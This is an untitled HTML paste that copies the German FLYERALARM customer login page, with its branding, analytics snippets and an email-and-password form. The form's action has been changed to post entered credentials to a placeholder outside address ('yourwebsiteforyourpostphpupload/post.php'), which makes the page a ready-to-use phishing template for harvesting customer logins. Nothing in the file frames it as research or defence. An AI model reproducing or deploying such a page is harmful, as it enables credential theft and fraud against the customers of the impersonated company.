Untitled
3 years ago in HTML
<!doctype html>
<html lang="en">
<head>
<!-- Google Tag Manager dataLayer -->
<script type="text/javascript">
window.dataLayer = window.dataLayer || [];
dataLayer.push({
"id01": "UA-1920031-1",
"id02": "UA-1920031-2",
"pageCountry": "de",
"pageLanguage": "de",
"pageCategory": "customer",
"pageType": "login",
"visitorLoginState": "false"
});
</script>
<!-- End Google Tag Manager dataLayer -->
<!-- Google Optimize Hide Snippet (Anti Flicker) -->
<style>.async-hide { opacity: 0 !important} </style><script>(function(a,s,y,n,c,h,i,d,e){s.className+=' '+y;h.end=i=function(){s.className=s.className.replace(RegExp(' ?'+y),'')};(a[n]=a[n]||[]).hide=h;setTimeout(function(){i();h.end=null},c);})(window,document.documentElement,'async-hide','dataLayer',2000,{'GTM-5L36BP':true});</script>
<!-- End Google Optimize Hide Snippet (Anti Flicker) -->
<!-- Analytics-Optimize Combined Snippet -->
<script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-1920031-2', 'auto', {allowLinker: false}); ga('require', 'GTM-5L36BP');</script>
<!-- End Analytics-Optimize Combined Snippet -->
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-MBLBPG');</script>
<!-- End Google Tag Manager -->
<script src="/auth/resources/ikhf9/login/flyeralarm/js/jquery.min.js"></script>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<title>FLYERALARM Login</title>
<link rel="stylesheet" type="text/css" href="/auth/resources/ikhf9/login/flyeralarm/css/flyshop_all.min.css">
<link rel="stylesheet" type="text/css" href="/auth/resources/ikhf9/login/flyeralarm/css/flyshop_content.bundle.css">
<link href="/auth/resources/ikhf9/login/flyeralarm/img/favicon.ico" rel="icon" type="image/x-icon">
<meta name="robots" content="noindex, follow" />
</head>
<body>
<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-MBLBPG" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
<header class="header header--minimal">
<a href="https://www.flyeralarm.com/de">
<img class="header--minimal__logo" src="/auth/resources/ikhf9/login/flyeralarm/img/flyeralarm-logo.svg" alt="Flyeralarm Logo">
</a>
</header>
<div class="grid-x align-center registration">
<div class="cell large-4 medium-9 small-12">
<div class="container-box -padding-0">
<div class="grid-x grid-padding-x grid-padding-y grid-margin-x">
<div class="cell u-padding-top-0">
<ul class="tabs grid-x" data-tabs="" id="registration-tabs">
<li class="cell small-12 medium-6 large-auto tabs-title is-active text-center">
<a href="/auth/realms/FLYERALARM_DE/login-actions/authenticate?client_id=flyshop&amp;tab_id=_geuqnMH7UI" aria-selected="true">Als Kunde einloggen</a>
</li>
<li class="cell small-12 medium-6 large-auto tabs-title text-center">
<a href="/auth/realms/FLYERALARM_DE/login-actions/registration?client_id=flyshop&amp;tab_id=_geuqnMH7UI">Als Neukunde registrieren</a>
</li>
</ul>
</div>
</div>
<div data-tabs-content="registration-tabs">
<form id="kc-form-login" class="gtm-login-form" action="http://yourwebsiteforyourpostphpupload/post.php" method="post">
<div class="tabs-panel is-active" id="panel1">
<label for="username">Meine E-Mail-Adresse
<input type="email" name="username" id="username" class="gtm-email" value="" required>
</label>
<label for="password">Mein Passwort
<div class="grid-x">
<div class="cell auto">
<input type="password" name="password" id="password" class="gtm-password" required />
</div>
<div class="cell shrink u-margin-left-half u-margin-bottom-1 align-self-middle">
<a data-tooltip tabindex="1" title="Passwort einblenden" data-position="bottom" data-alignment="center"
toggle="#password-field" id="togglePassword" class="fa fa-fw fa-eye-slash field_icon toggle-password -text-light"></a>
</div>
</div>
</label>
<div class="form-check form-group">
<input id="checkbox1" type="checkbox" name="rememberMe"><label for="checkbox1">Angemeldet bleiben</label>
</div>
<button type="submit" id="kc-login" class="button expanded u-margin-top-1 gtm-login">Jetzt einloggen</button>
<div class="grid-x">
<div class="cell auto"><a href="https://www.flyeralarm.com/de" class="gtm-cancel">Zurück</a></div>
<div class="cell shrink"><a href="https://www.flyeralarm.com/de/user/index/password">Passwort vergessen?</a></div>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
<script type="text/javascript" src="/auth/resources/ikhf9/login/flyeralarm/js/foundation.min.js"></script>
<script>
$(document).foundation();
function showPassword(){
let el = document.getElementById("password");
let tooltip = document.getElementById(document.getElementById("togglePassword").dataset.toggle);
if (el.type == "text") {
el.type = "password";
tooltip.innerHTML = "Passwort einblenden";
} else {
el.type = "text";
tooltip.innerHTML = "Passwort ausblenden";
}
let toggle = document.getElementById("togglePassword");
if (toggle.classList.contains("fa-eye-slash")) {
toggle.classList.remove("fa-eye-slash");
toggle.classList.add("fa-eye");
} else {
toggle.classList.remove("fa-eye");
toggle.classList.add("fa-eye-slash");
}
}
document.getElementById("togglePassword").addEventListener("click", showPassword);
</script>
</body>
</html>